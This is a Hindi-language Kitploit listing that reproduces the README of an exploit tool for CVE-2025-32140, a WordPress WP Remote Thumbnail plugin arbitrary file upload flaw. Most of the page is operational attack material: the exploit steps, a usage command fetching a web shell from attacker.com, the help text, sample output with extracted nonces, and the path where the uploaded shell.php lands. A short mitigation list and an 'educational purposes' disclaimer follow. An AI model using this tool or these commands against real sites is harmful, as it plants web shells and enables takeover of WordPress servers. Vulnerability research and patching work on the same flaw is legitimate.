Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32140 — वर्डप्रेस WP Remote Thumbnail Plugin <= 1.3.2 मनमानी फ़ाइल अपलोड के लिए संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-32140
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-32140

CVE-2025-32140

वर्डप्रेस WP Remote Thumbnail Plugin <= 1.3.2 मनमानी फ़ाइल अपलोड के लिए संवेदनशील है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2025-32140 – WP रिमोट थंबनेल एक्सप्लॉइट (मनमाना फ़ाइल अपलोड)


📝 विवरण

CVE-2025-32140 वर्डप्रेस के लिए WP रिमोट थंबनेल प्लगइन में एक गंभीर कमजोरी है। यह प्रमाणित हमलावरों (योगदानकर्ता या उच्च अनुमतियों वाले) को अस्वच्छ URLs स्वीकार करने वाली एक दोषपूर्ण सुविधा का दुरुपयोग करके मनमानी फ़ाइलें, जैसे वेब शेल, अपलोड करने में सक्षम बनाता है।

प्लगइन प्रदान किए गए remote_thumb URL से प्राप्त फ़ाइल प्रकार या सामग्री को मान्य करने में विफल रहता है। यह हमलावरों को दुर्भावनापूर्ण PHP फ़ाइलों (जैसे, बैकडोर) को /wp-content/uploads निर्देशिका में सहेजने की अनुमति देता है।


⚠️ कमजोर घटक

  • प्लगइन: WP रिमोट थंबनेल
  • कमजोर संस्करण: <= 1.3.2
  • पैच किया गया संस्करण: अभी तक जारी नहीं हुआ
  • हमला वेक्टर: नेटवर्क
  • आवश्यक विशेषाधिकार: कम (edit_post क्षमता वाला प्रमाणित उपयोगकर्ता)
  • CVSS स्कोर: 9.9 (गंभीर)

🛠 एक्सप्लॉइट स्क्रिप्ट

यह Python स्क्रिप्ट CVE-2025-32140 के शोषण को स्वचालित करती है, निम्नलिखित चरणों का प्रदर्शन करती है:

  1. लक्ष्य वर्डप्रेस साइट में लॉग इन करता है।
  2. स्वचालित रूप से आवश्यक नॉन्स निकालता है।
  3. remote_thumb पैरामीटर के माध्यम से एक दुर्भावनापूर्ण अनुरोध तैयार करता है और भेजता है।
  4. लक्ष्य साइट पर एक वेब शेल अपलोड करता है।

🔧 कमांड-लाइन विकल्प


🚀 उपयोग

root@kitploit:~
python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php

📖 उपयोग और सहायता

root@kitploit:~

                                                                                                                
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL

Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
  --username, -un USERNAME
                        Username
  --password, -p PASSWORD
                        Password
  --user_ID, -uid USER_ID
                        User ID (usually 1 for admin)
  --post_ID, -pid POST_ID
                        Target post ID
  --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)


📋 उदाहरण आउटपुट

root@kitploit:~
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited


📂 शेल स्थान

एक बार शोषण होने के बाद, अपलोड किया गया वेब शेल संभवतः यहाँ संग्रहीत होगा:

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php

YYYY/MM को अपलोड के वर्तमान वर्ष और महीने से बदलें।


🛡 अनुशंसाएँ

इस कमजोरी से उत्पन्न जोखिम को कम करने के लिए:

  1. प्लगइन को अपडेट करें नवीनतम संस्करण में (एक बार पैच जारी होने पर)।
  2. फ़ाइल अपलोड क्षमताओं को केवल विश्वसनीय उपयोगकर्ताओं तक सीमित करें।
  3. यदि आवश्यक नहीं है तो रिमोट थंबनेल फ़ेच सुविधा को अक्षम करें।

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है।
लेखक इस एक्सप्लॉइट के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


👤 लेखक

द्वारा: Nxploited ( Khaled Alenazi ) 🌟

टूल डाउनलोड करें
विकल्पउपनामविवरण
--url-uलक्ष्य वर्डप्रेस साइट URL (जैसे, http://target.com/wordpress)
--username-unपोस्ट संपादन विशेषाधिकारों वाला वर्डप्रेस उपयोगकर्ता नाम
--password-pनिर्दिष्ट उपयोगकर्ता नाम का पासवर्ड
--user_ID-uidवर्डप्रेस उपयोगकर्ता आईडी (आमतौर पर एडमिन के लिए 1)
--post_ID-pidसंपादित की जाने वाली पोस्ट की आईडी (एक ड्राफ्ट हो सकता है)
--shellहमलावर के सर्वर पर होस्ट किए गए PHP वेब शेल का सीधा URL